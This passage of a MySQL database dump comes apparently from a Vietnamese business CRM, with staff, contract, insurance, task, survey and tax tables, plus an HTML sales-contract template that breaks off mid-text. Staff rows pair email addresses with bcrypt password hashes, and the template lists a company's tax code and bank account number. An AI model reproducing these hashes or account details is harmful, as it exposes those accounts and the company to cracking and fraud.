INSERT INTO `tblstaff` (`staffid`, `email`, `firstname`, `lastname`, `facebook`, `linkedin`, `phonenumber`, `skype`, `password`, `datecreated`, `profile_image`, `last_ip`, `last_login`, `last_activity`, `last_password_change`, `new_pass_key`, `new_pass_key_requested`, `admin`, `role`, `active`, `default_language`, `direction`, `media_path_slug`, `is_not_staff`, `hourly_rate`, `two_factor_auth_enabled`, `two_factor_auth_code`, `two_factor_auth_code_requested`, `email_signature`, `birthday`, `birthplace`, `sex`, `marital_status`, `nation`, `religion`, `identification`, `days_for_identity`, `home_town`, `resident`, `current_address`, `literacy`, `orther_infor`, `job_position`, `workplace`, `place_of_issue`, `account_number`, `name_account`, `issue_bank`, `records_received`, `Personal_tax_code`, `google_auth_secret`, `team_manage`, `staff_identifi`, `status_work`, `date_update`) VALUES
(1, 'wit.admin@gmail.com', 'Admin', 'WIT', '', '', '', '', '$2a$08$pzvgDStIHt19X4DYdIpBmOCUL/pfrNadwLaf/AOiepWuasZptljr6', '2021-12-27 15:37:40', 'Logo-WIT-ex_WIT-logo-only-copy.png', '127.0.0.1', '2024-06-12 16:22:59', '2024-06-12 21:40:05', '2024-06-12 16:25:00', NULL, NULL, 1, 0, 1, '', '', NULL, 0, 0.00, 0, NULL, NULL, 'Tổ chức đào tạo WIT', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, NULL, NULL),
(7, 'cskh@hogiaphat.vn', 'CSKH', '', '', '', '', '', '$2a$08$hcS9.5TpC5H1WuSuIawxLedlq.WDJlGQbfd.uBZuy0NPFArFmi1dW', '2022-01-09 20:40:40', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, 0, '', '', 'cskh', 0, 0.00, 0, NULL, NULL, '', NULL, '', '', '', '', '', '', NULL, '', '', '', '', '', 0, 0, '', '', '', '', NULL, '', NULL, 0, 'NV-036', '', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `tblstaff_contract`
--

CREATE TABLE `tblstaff_contract` (
  `id_contract` int(10) UNSIGNED NOT NULL,
  `contract_code` varchar(15) NOT NULL,
  `name_contract` int(11) NOT NULL,
  `staff` int(11) NOT NULL,
  `contract_form` varchar(191) DEFAULT NULL,
  `start_valid` date DEFAULT NULL,
  `end_valid` date DEFAULT NULL,
  `contract_status` varchar(100) DEFAULT NULL,
  `salary_form` int(11) DEFAULT NULL,
  `allowance_type` varchar(11) DEFAULT NULL,
  `sign_day` date DEFAULT NULL,
  `staff_delegate` int(11) DEFAULT NULL,
  `staff_role` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblstaff_contracttype`
--

CREATE TABLE `tblstaff_contracttype` (
  `id_contracttype` int(10) UNSIGNED NOT NULL,
  `name_contracttype` varchar(200) NOT NULL,
  `contracttype` varchar(200) NOT NULL,
  `duration` int(11) DEFAULT NULL,
  `unit` varchar(20) DEFAULT NULL,
  `insurance` tinyint(1) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblstaff_contracttype`
--

INSERT INTO `tblstaff_contracttype` (`id_contracttype`, `name_contracttype`, `contracttype`, `duration`, `unit`, `insurance`) VALUES
(1, 'Hợp đồng thử việc', '', 0, '', 1),
(2, 'Hợp đồng chính thức', '', 0, '', 0);

-- --------------------------------------------------------

--
-- Table structure for table `tblstaff_contract_detail`
--

CREATE TABLE `tblstaff_contract_detail` (
  `contract_detail_id` int(10) UNSIGNED NOT NULL,
  `staff_contract_id` int(10) UNSIGNED NOT NULL,
  `since_date` date DEFAULT NULL,
  `contract_note` varchar(100) DEFAULT NULL,
  `contract_salary_expense` longtext DEFAULT NULL,
  `contract_allowance_expense` longtext DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblstaff_departments`
--

CREATE TABLE `tblstaff_departments` (
  `staffdepartmentid` int(11) NOT NULL,
  `staffid` int(11) NOT NULL,
  `departmentid` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblstaff_insurance`
--

CREATE TABLE `tblstaff_insurance` (
  `insurance_id` int(10) UNSIGNED NOT NULL,
  `staff_id` int(10) UNSIGNED NOT NULL,
  `insurance_book_num` varchar(100) DEFAULT NULL,
  `health_insurance_num` varchar(100) DEFAULT NULL,
  `city_code` varchar(100) DEFAULT NULL,
  `registration_medical` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblstaff_insurance_history`
--

CREATE TABLE `tblstaff_insurance_history` (
  `id` int(10) UNSIGNED NOT NULL,
  `insurance_id` int(10) UNSIGNED NOT NULL,
  `staff_id` int(10) UNSIGNED DEFAULT NULL,
  `from_month` date DEFAULT NULL,
  `formality` varchar(50) DEFAULT NULL,
  `reason` varchar(50) DEFAULT NULL,
  `premium_rates` varchar(100) DEFAULT NULL,
  `payment_company` varchar(100) DEFAULT NULL,
  `payment_worker` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblstaff_permissions`
--

CREATE TABLE `tblstaff_permissions` (
  `staff_id` int(11) NOT NULL,
  `feature` varchar(40) NOT NULL,
  `capability` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblstock_take`
--

CREATE TABLE `tblstock_take` (
  `id` int(10) UNSIGNED NOT NULL,
  `description` text DEFAULT NULL COMMENT 'the reason stock take',
  `warehouse_id` int(11) DEFAULT NULL,
  `date_stock_take` date DEFAULT NULL,
  `stock_take_code` varchar(100) DEFAULT NULL COMMENT 'số kiểm kê kho',
  `date_add` date DEFAULT NULL,
  `hour_add` date DEFAULT NULL,
  `staff_id` varchar(100) DEFAULT NULL,
  `approval` int(11) DEFAULT 0 COMMENT 'status approval ',
  `addedfrom` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblstock_take_detail`
--

CREATE TABLE `tblstock_take_detail` (
  `id` int(10) UNSIGNED NOT NULL,
  `stock_take_id` int(11) NOT NULL,
  `commodity_code` varchar(100) DEFAULT NULL,
  `commodity_name` text DEFAULT NULL,
  `unit_id` text DEFAULT NULL,
  `unit_price` varchar(100) DEFAULT NULL,
  `quantity_stock_take` varchar(100) DEFAULT NULL,
  `quantity_accounting_book` varchar(100) DEFAULT NULL,
  `quantity_change` varchar(100) DEFAULT NULL,
  `handling` text DEFAULT NULL,
  `reason` text DEFAULT NULL,
  `approval` int(11) DEFAULT 0 COMMENT 'status approval '
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsubscriptions`
--

CREATE TABLE `tblsubscriptions` (
  `id` int(11) NOT NULL,
  `name` varchar(191) NOT NULL,
  `description` text DEFAULT NULL,
  `description_in_item` tinyint(1) NOT NULL DEFAULT 0,
  `clientid` int(11) NOT NULL,
  `date` date DEFAULT NULL,
  `terms` text DEFAULT NULL,
  `currency` int(11) NOT NULL,
  `tax_id` int(11) NOT NULL DEFAULT 0,
  `stripe_tax_id` varchar(50) DEFAULT NULL,
  `tax_id_2` int(11) NOT NULL DEFAULT 0,
  `stripe_tax_id_2` varchar(50) DEFAULT NULL,
  `stripe_plan_id` text DEFAULT NULL,
  `stripe_subscription_id` text NOT NULL,
  `next_billing_cycle` bigint(20) DEFAULT NULL,
  `ends_at` bigint(20) DEFAULT NULL,
  `status` varchar(50) DEFAULT NULL,
  `quantity` int(11) NOT NULL DEFAULT 1,
  `project_id` int(11) NOT NULL DEFAULT 0,
  `hash` varchar(32) NOT NULL,
  `created` datetime NOT NULL,
  `created_from` int(11) NOT NULL,
  `date_subscribed` datetime DEFAULT NULL,
  `in_test_environment` int(11) DEFAULT NULL,
  `last_sent_at` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsurveyresultsets`
--

CREATE TABLE `tblsurveyresultsets` (
  `resultsetid` int(11) NOT NULL,
  `surveyid` int(11) NOT NULL,
  `ip` varchar(40) NOT NULL,
  `useragent` varchar(150) NOT NULL,
  `date` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsurveys`
--

CREATE TABLE `tblsurveys` (
  `surveyid` int(11) NOT NULL,
  `subject` mediumtext NOT NULL,
  `slug` mediumtext NOT NULL,
  `description` text NOT NULL,
  `viewdescription` text DEFAULT NULL,
  `datecreated` datetime NOT NULL,
  `redirect_url` varchar(100) DEFAULT NULL,
  `send` tinyint(1) NOT NULL DEFAULT 0,
  `onlyforloggedin` int(11) DEFAULT 0,
  `fromname` varchar(100) DEFAULT NULL,
  `iprestrict` tinyint(1) NOT NULL,
  `active` tinyint(1) NOT NULL DEFAULT 1,
  `hash` varchar(32) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblsurveys`
--

INSERT INTO `tblsurveys` (`surveyid`, `subject`, `slug`, `description`, `viewdescription`, `datecreated`, `redirect_url`, `send`, `onlyforloggedin`, `fromname`, `iprestrict`, `active`, `hash`) VALUES
(1, 'Khảo sát ý kiến - nhân viên Tổ chức đào tạo WIT', 'khao-sat-y-kien-nhan-vien-hamilton-air', '', '', '2023-09-26 21:20:39', '', 0, 1, '', 0, 0, '364627c2bb400cc8a906550d8605fd78');

-- --------------------------------------------------------

--
-- Table structure for table `tblsurveysemailsendcron`
--

CREATE TABLE `tblsurveysemailsendcron` (
  `id` int(11) NOT NULL,
  `surveyid` int(11) NOT NULL,
  `email` varchar(100) NOT NULL,
  `emailid` int(11) DEFAULT NULL,
  `listid` varchar(11) DEFAULT NULL,
  `log_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblsurveysendlog`
--

CREATE TABLE `tblsurveysendlog` (
  `id` int(11) NOT NULL,
  `surveyid` int(11) NOT NULL,
  `total` int(11) NOT NULL,
  `date` datetime NOT NULL,
  `iscronfinished` int(11) NOT NULL DEFAULT 0,
  `send_to_mail_lists` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblsurveysendlog`
--

INSERT INTO `tblsurveysendlog` (`id`, `surveyid`, `total`, `date`, `iscronfinished`, `send_to_mail_lists`) VALUES
(1, 1, 0, '2023-09-26 21:20:59', 1, 'a:1:{i:0;s:27:\"survey_send_mail_list_staff\";}');

-- --------------------------------------------------------

--
-- Table structure for table `tbltaggables`
--

CREATE TABLE `tbltaggables` (
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(20) NOT NULL,
  `tag_id` int(11) NOT NULL,
  `tag_order` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbltaggables`
--

INSERT INTO `tbltaggables` (`rel_id`, `rel_type`, `tag_id`, `tag_order`) VALUES
(65, 'estimate_request', 7, 1);

-- --------------------------------------------------------

--
-- Table structure for table `tbltags`
--

CREATE TABLE `tbltags` (
  `id` int(11) NOT NULL,
  `name` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbltags`
--

INSERT INTO `tbltags` (`id`, `name`) VALUES
(4, 'Bảo dưỡng'),
(5, 'Bảo hành'),
(3, 'Giao hàng'),
(6, 'Kiểm tra'),
(7, 'New Lead');

-- --------------------------------------------------------

--
-- Table structure for table `tbltasks`
--

CREATE TABLE `tbltasks` (
  `id` int(11) NOT NULL,
  `name` mediumtext DEFAULT NULL,
  `description` text DEFAULT NULL,
  `priority` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL,
  `startdate` date NOT NULL,
  `duedate` date DEFAULT NULL,
  `datefinished` datetime DEFAULT NULL,
  `addedfrom` int(11) NOT NULL,
  `is_added_from_contact` tinyint(1) NOT NULL DEFAULT 0,
  `status` int(11) NOT NULL DEFAULT 0,
  `recurring_type` varchar(10) DEFAULT NULL,
  `repeat_every` int(11) DEFAULT NULL,
  `recurring` int(11) NOT NULL DEFAULT 0,
  `is_recurring_from` int(11) DEFAULT NULL,
  `cycles` int(11) NOT NULL DEFAULT 0,
  `total_cycles` int(11) NOT NULL DEFAULT 0,
  `custom_recurring` tinyint(1) NOT NULL DEFAULT 0,
  `last_recurring_date` date DEFAULT NULL,
  `rel_id` int(11) DEFAULT NULL,
  `rel_type` varchar(30) DEFAULT NULL,
  `is_public` tinyint(1) NOT NULL DEFAULT 0,
  `billable` tinyint(1) NOT NULL DEFAULT 0,
  `billed` tinyint(1) NOT NULL DEFAULT 0,
  `invoice_id` int(11) NOT NULL DEFAULT 0,
  `hourly_rate` decimal(15,2) NOT NULL DEFAULT 0.00,
  `milestone` int(11) DEFAULT 0,
  `kanban_order` int(11) DEFAULT 1,
  `milestone_order` int(11) NOT NULL DEFAULT 0,
  `visible_to_client` tinyint(1) NOT NULL DEFAULT 0,
  `deadline_notified` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbltaskstimers`
--

CREATE TABLE `tbltaskstimers` (
  `id` int(11) NOT NULL,
  `task_id` int(11) NOT NULL,
  `start_time` varchar(64) NOT NULL,
  `end_time` varchar(64) DEFAULT NULL,
  `staff_id` int(11) NOT NULL,
  `hourly_rate` decimal(15,2) NOT NULL DEFAULT 0.00,
  `note` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbltasks_checklist_templates`
--

CREATE TABLE `tbltasks_checklist_templates` (
  `id` int(11) NOT NULL,
  `description` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbltasks_checklist_templates`
--

INSERT INTO `tbltasks_checklist_templates` (`id`, `description`) VALUES
(1, 'Đã nhận hàng'),
(2, 'Đã hoàn thành');

-- --------------------------------------------------------

--
-- Table structure for table `tbltask_assigned`
--

CREATE TABLE `tbltask_assigned` (
  `id` int(11) NOT NULL,
  `staffid` int(11) NOT NULL,
  `taskid` int(11) NOT NULL,
  `assigned_from` int(11) NOT NULL DEFAULT 0,
  `is_assigned_from_contact` tinyint(1) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbltask_checklist_items`
--

CREATE TABLE `tbltask_checklist_items` (
  `id` int(11) NOT NULL,
  `taskid` int(11) NOT NULL,
  `description` text NOT NULL,
  `finished` int(11) NOT NULL DEFAULT 0,
  `dateadded` datetime NOT NULL,
  `addedfrom` int(11) NOT NULL,
  `finished_from` int(11) DEFAULT 0,
  `list_order` int(11) NOT NULL DEFAULT 0,
  `assigned` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbltask_comments`
--

CREATE TABLE `tbltask_comments` (
  `id` int(11) NOT NULL,
  `content` text NOT NULL,
  `taskid` int(11) NOT NULL,
  `staffid` int(11) NOT NULL,
  `contact_id` int(11) NOT NULL DEFAULT 0,
  `file_id` int(11) NOT NULL DEFAULT 0,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbltask_followers`
--

CREATE TABLE `tbltask_followers` (
  `id` int(11) NOT NULL,
  `staffid` int(11) NOT NULL,
  `taskid` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbltaxes`
--

CREATE TABLE `tbltaxes` (
  `id` int(11) NOT NULL,
  `name` varchar(100) NOT NULL,
  `taxrate` decimal(15,2) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbltaxes`
--

INSERT INTO `tbltaxes` (`id`, `name`, `taxrate`) VALUES
(1, 'Thuế GTGT 10%', 10.00),
(2, 'Thuế GTGT 8%', 8.00);

-- --------------------------------------------------------

--
-- Table structure for table `tbltemplates`
--

CREATE TABLE `tbltemplates` (
  `id` int(10) UNSIGNED NOT NULL,
  `name` varchar(255) NOT NULL,
  `type` varchar(100) NOT NULL,
  `addedfrom` int(11) NOT NULL,
  `content` longtext DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbltemplates`
--

INSERT INTO `tbltemplates` (`id`, `name`, `type`, `addedfrom`, `content`) VALUES
(1, 'Hợp đồng mua bán', 'contracts', 1, '<div style=\"text-align:center;\"><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>C&#7896;NG H&#210;A X&#192; H&#7896;I CH&#7910; NGHI&#195; VI&#7878;T NAM</strong></span></div>\n<div style=\"text-align:center;\"><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>&#272;&#7896;C L&#7852;P - T&#7920; DO - H&#7840;NH PH&#218;C</strong></span></div>\n<div style=\"text-align:center;\"><span style=\"font-family:arial, helvetica, sans-serif;\">---------o0o--------</span></div>\n<div style=\"text-align:center;\"><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>H&#7906;P &#272;&#7890;NG MUA B&#193;N</strong></span></div>\n<div style=\"text-align:center;\"><span style=\"font-family:arial, helvetica, sans-serif;\">&#160;(S&#7889;/<em>No.</em>: 1412/2021/H&#272;KT/HA-GBA)</span></div>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#160;</span></p>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">C&#259;n c&#7913; Lu&#7853;t Th&#432;&#417;ng M&#7841;i s&#7889; 36/2005/QH13 do Qu&#7889;c h&#7897;i c&#7911;a n&#432;&#7899;c C&#7897;ng H&#242;a X&#227; H&#7897;i Ch&#7911; Ngh&#297;a Vi&#7879;t Nam ban h&#224;nh ng&#224;y ng&#224;y 14 th&#225;ng 06 n&#259;m 2005 v&#224; c&#225;c v&#259;n b&#7843;n h&#432;&#7899;ng d&#7851;n thi h&#224;nh;</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">C&#259;n c&#7913; Lu&#7853;t s&#7889; 91/2015/QH13 v&#7873; D&#226;n s&#7921; do Qu&#7889;c h&#7897;i c&#7911;a n&#432;&#7899;c C&#7897;ng H&#242;a X&#227; H&#7897;i Ch&#7911; Ngh&#297;a Vi&#7879;t Nam ban h&#224;nh ng&#224;y 24 th&#225;ng 11 n&#259;m 2015;</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">C&#259;n c&#7913; ch&#7913;c n&#259;ng, nhu c&#7847;u v&#224; kh&#7843; n&#259;ng c&#7911;a hai b&#234;n;</span></li>\n</ul>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">H&#244;m nay, ng&#224;y 14 th&#225;ng 12 n&#259;m 2021, ch&#250;ng t&#244;i g&#7891;m:</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong><u>B&#202;N A (B&#234;n mua)</u></strong><strong>:&#160;</strong></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#272;&#7883;a ch&#7881;:&#160; &#160; &#160; &#160; &#160; &#160;</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#272;i&#7879;n tho&#7841;i:&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">M&#227; s&#7889; thu&#7871;<em>:</em>&#160; &#160;&#160;</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#272;&#7841;i di&#7879;n b&#7903;i:<strong>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; </strong>Ch&#7913;c v&#7909;:</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Mobile:&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; Email:&#160;</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">V&#224;/<em>And</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><em>&#160;</em></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong><u>B&#202;N B (B&#234;n b&#225;n):</u></strong><strong> C&#212;NG TY C&#7892; PH&#7846;N C&#212;NG NGH&#7878; HAMILTON AIR</strong></span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#272;&#7883;a ch&#7881;: &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; 184 Tr&#7847;n L&#7921;u, Ph&#432;&#7901;ng An Ph&#250;, Th&#224;nh Ph&#7889; Th&#7911; &#272;&#7913;c, Th&#224;nh Ph&#7889; H&#7891; Ch&#237; Minh, Vi&#7879;t Nam</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#272;i&#7879;n tho&#7841;i : &#160;&#160;&#160; (+84) 08 351 00197&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">M&#227; s&#7889; thu&#7871;<em>:</em> &#160;&#160;&#160; 0315778682</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">T&#224;i kho&#7843;n s&#7889;<em>:</em> 19134536065013&#160;</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">T&#7841;i ng&#226;n h&#224;ng: Ng&#226;n H&#224;ng Techcombank &#8211; Chi Nh&#225;nh Gia &#272;&#7883;nh</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#272;&#7841;i di&#7879;n b&#7903;i : <strong>&#212;ng / Mr. H&#7890; V&#258;N C&#212;NG</strong><strong>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; </strong>Ch&#7913;c v&#7909;: Gi&#225;m &#273;&#7889;c</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Mobile:&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; (+84) 02866783363&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Email:&#160; hamiltonairco@gmail.com</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#160;</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n A v&#224; B&#234;n B sau &#273;&#226;y g&#7885;i ri&#234;ng l&#224; &#8220;<strong>B&#234;n</strong>&#8221; v&#224; g&#7885;i chung l&#224; &#8220;<strong>C&#225;c B&#234;n</strong>&#8221;.</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Hai b&#234;n th&#7889;ng nh&#7845;t k&#253; k&#7871;t H&#7907;p &#272;&#7891;ng Mua B&#225;n n&#224;y (&#8220;<strong>H&#7907;p &#272;&#7891;ng</strong>&#8221;) v&#7899;i c&#225;c &#273;i&#7873;u kho&#7843;n v&#224; &#273;i&#7873;u ki&#7879;n nh&#432; sau:</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#160;</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">&#160;</span></p>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>N&#7896;I DUNG </strong></span></li>\n</ul>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\">Theo c&#225;c &#273;i&#7873;u kho&#7843;n v&#224; &#273;i&#7873;u ki&#7879;n c&#7911;a h&#7907;p &#273;&#7891;ng n&#224;y, B&#234;n b&#225;n &#273;&#7891;ng &#253; b&#225;n v&#224; B&#234;n mua &#273;&#7891;ng &#253; mua H&#224;ng h&#243;a &#273;&#432;&#7907;c n&#234;u t&#7841;i Ph&#7909; l&#7909;c 1 (Chi ti&#7871;t h&#224;ng h&#243;a) t&#7915; B&#234;n B&#225;n.</span></p>\n<p><span style=\"font-family:arial, helvetica, sans-serif;\"><strong>&#160;</strong></span></p>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong> </strong><strong>GIAO H&#192;NG &amp; L&#7854;P &#272;&#7862;T</strong></span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong><strong>Th&#7901;i h&#7841;n giao h&#224;ng v&#224; &#273;&#7883;a &#273;i&#7875;m giao h&#224;ng</strong></span></li>\n</ul>\n</li>\n</ul>\n<ol>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Th&#417;&#768;i gian giao ha&#768;ng: 08-10 tu&#7847;n k&#7875; ng&#224;y t&#7915; khi B&#234;n B&#225;n nh&#7853;n &#273;&#432;&#7907;c thanh to&#225;n &#273;&#7907;t 1 t&#7915; B&#234;n Mua.</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">&#272;i&#803;a &#273;i&#234;&#777;m giao ha&#768;ng:</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Th&#244;ng tin ng&#432;&#7901;i nh&#7853;n h&#224;ng:</span>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\"><strong></strong><strong>&#272;i&#7873;u ki&#7879;n b&#224;n giao h&#224;ng h&#243;a:</strong></span></li>\n</ul>\n</li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">B&#234;n B&#225;n s&#7869; cung c&#7845;p cho B&#234;n Mua nh&#7919;ng ch&#7913;ng t&#7915; sau:</span></li>\n</ol>\n<ul>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">V&#259;n b&#7843;n &#273;&#7873; ngh&#7883; thanh to&#225;n c&#7911;a b&#234;n B&#225;n;</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">H&#243;a &#273;&#417;n gi&#225; tr&#7883; gia t&#259;ng h&#7907;p l&#7879; cho to&#224;n b&#7897; l&#244; h&#224;ng;</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Bi&#234;n b&#7843;n giao nh&#7853;n h&#224;ng h&#243;a v&#224; Bi&#234;n b&#7843;n nghi&#7879;m thu l&#7855;p &#273;&#7863;t c&#243; ch&#7919; k&#253; &#273;&#243;ng d&#7845;u c&#7911;a &#273;&#7841;i di&#7879;n c&#243; th&#7849;m quy&#7873;n c&#7911;a Hai B&#234;n;</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">B&#7843;n g&#7889;c Ch&#7913;ng th&#432; b&#7843;o l&#227;nh b&#7843;o h&#224;nh c&#243; gi&#225; tr&#7883; b&#7857;ng 5% Gi&#225; Tr&#7883; H&#7907;p &#272;&#7891;ng (tr&#432;&#7899;c Thu&#7871;);</span></li>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Gi&#7845;y t&#7901; k&#232;m theo h&#224;ng h&#243;a bao g&#7891;m: Gi&#7845;y ch&#7913;ng nh&#7853;n ch&#7845;t l&#432;&#7907;ng (Certificate of Quality), Th&#432; x&#225;c nh&#7853;n ngu&#7891;n g&#7889;c xu&#7845;t x&#7913; (Letter Confirmation Origion) c&#7911;a nh&#224; s&#7843;n xu&#7845;t, T&#224;i li&#7879;u k&#7929; thu&#7853;t, h&#7891; s&#417; h&#432;&#7899;ng d&#7851;n v&#7853;n h&#224;nh (n&#7871;u c&#243;).</span></li>\n</ul>\n<ol>\n<li><span style=\"font-family:arial, helvetica, sans-serif;\">Vi&#7879;c b&#224;n giao h&#224;ng h&#243;a ch&#7881; 